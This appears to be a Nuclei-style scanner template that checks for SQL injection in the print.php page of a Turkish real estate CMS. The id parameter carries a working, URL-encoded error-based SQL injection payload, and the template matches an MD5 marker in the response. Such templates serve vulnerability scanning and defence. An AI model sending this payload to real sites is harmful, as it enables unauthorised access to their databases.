id: Turkish-cms-sqli

info:
  name: Turkish Real Estate print.php存在SQL注入
  author: Str1am
  severity: high
  tags: Turkish

requests:
  - method: GET
    path:
      - "{{BaseURL}}/template/default/print.php?id=702%27%20AND%20(SELECT%201040%20FROM(SELECT%20COUNT(*),CONCAT(md5(123),(SELECT%20(ELT(1040=1040,1))),md5(123),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20%27TrDc%27=%27TrDc"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "202cb962ac59075b964b07152d234b701"
        part: body
        condition: and